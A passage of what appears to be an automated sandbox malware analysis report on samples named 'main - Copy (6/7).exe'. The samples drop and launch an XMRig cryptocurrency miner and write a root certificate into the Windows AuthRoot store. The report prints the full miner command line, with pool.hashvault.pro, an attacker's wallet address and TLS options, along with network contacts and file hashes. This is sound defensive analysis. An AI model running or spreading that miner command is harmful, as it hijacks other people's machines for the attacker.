Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1992 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4344,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=3944 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1032,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=1036 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/812-14-0x0000024F573F0000-0x0000024F57410000-memory.dmp

memory/812-15-0x0000024FEB0A0000-0x0000024FEB0C0000-memory.dmp

memory/812-16-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-18-0x0000024FEB710000-0x0000024FEB730000-memory.dmp

memory/812-17-0x0000024FEB6F0000-0x0000024FEB710000-memory.dmp

memory/812-19-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-20-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-23-0x0000024FEB710000-0x0000024FEB730000-memory.dmp

memory/812-22-0x0000024FEB6F0000-0x0000024FEB710000-memory.dmp

memory/812-21-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-24-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-25-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-26-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-27-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-28-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-29-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-30-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-31-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-32-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-33-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-34-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-35-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-36-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-37-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-38-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-39-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-40-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-41-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-42-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-43-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-44-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-45-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-46-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-47-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-48-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-49-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-50-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-51-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-52-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-53-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-54-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-55-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-56-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-57-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-58-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-59-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-60-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-61-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-62-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-63-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-64-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-65-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-66-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-67-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-68-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-69-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-70-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-71-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-72-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-73-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-74-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-75-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-76-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-77-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-78-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-79-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-80-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-81-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

memory/812-82-0x00007FF73AC60000-0x00007FF73B763000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:36

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1801s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3872 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 3872 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4272-14-0x000001DC546E0000-0x000001DC54700000-memory.dmp

memory/4272-15-0x000001DC560D0000-0x000001DC560F0000-memory.dmp

memory/4272-16-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-17-0x000001DC56110000-0x000001DC56130000-memory.dmp

memory/4272-18-0x000001DC560F0000-0x000001DC56110000-memory.dmp

memory/4272-19-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-20-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-23-0x000001DC560F0000-0x000001DC56110000-memory.dmp

memory/4272-22-0x000001DC56110000-0x000001DC56130000-memory.dmp

memory/4272-21-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-24-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-25-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-26-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-27-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-28-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-29-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-30-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-31-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-32-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-33-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-34-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-35-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-36-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-37-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-38-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-39-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-40-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-41-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-42-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-43-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-44-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-45-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-46-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-47-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-48-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-49-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-50-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-51-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-52-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-53-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-54-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-55-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-56-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-57-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-58-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-59-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-60-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-61-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-62-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-63-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-64-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-65-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-66-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-67-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-68-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-69-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-70-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-71-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-72-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-73-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-74-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-75-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-76-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-77-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-78-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-79-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-80-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-81-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

memory/4272-82-0x00007FF75DC50000-0x00007FF75E753000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:39

